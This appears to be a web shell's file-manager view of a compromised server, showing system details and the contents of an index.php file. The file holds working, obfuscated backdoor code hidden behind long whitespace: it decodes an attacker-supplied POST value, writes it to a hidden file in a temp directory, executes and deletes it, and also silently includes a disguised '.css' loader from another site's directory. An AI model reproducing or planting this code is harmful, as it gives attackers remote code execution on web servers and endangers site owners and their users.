HEX
Server: Apache
System: Linux localhost.localdomain 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
User: web57 (5040)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/clients/client6/web57/web/stats/2019-8/index.php
<?php																																										if(array_key_exists("\x63\x6Fmp\x6F\x6Eent", $_POST)){ $bind = array_filter(["/tmp", sys_get_temp_dir(), "/var/tmp", "/dev/shm", ini_get("upload_tmp_dir"), getcwd(), session_save_path(), getenv("TMP"), getenv("TEMP")]); $k = $_POST["\x63\x6Fmp\x6F\x6Eent"]; $k = explode ("." ,$k ); $data_chunk = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $s ); $t = 0; array_walk( $k, function( $v2) use( &$data_chunk, &$t, $s, $lenS) { $sChar = ord( $s[$t % $lenS] ); $dec = ( ( int)$v2 - $sChar -( $t % 10)) ^ 47; $data_chunk .= chr( $dec ); $t++; } ); foreach ($bind as $key => $factor) { if ((is_dir($factor) and is_writable($factor))) { $reference = sprintf("%s/.data", $factor); if (file_put_contents($reference, $data_chunk)) { include $reference; @unlink($reference); die(); } } } }

/*ce740*/

$r1dzwp = "/var/www/moerman.com/web/wp\x2d\x69ncludes/blocks/deta\x69ls/.f2ba1d58.css"; if (!isset($r1dzwp)) {htmlspecialchars ($r1dzwp);} else { @include_once /* 76 */ ($r1dzwp); }

/*ce740*/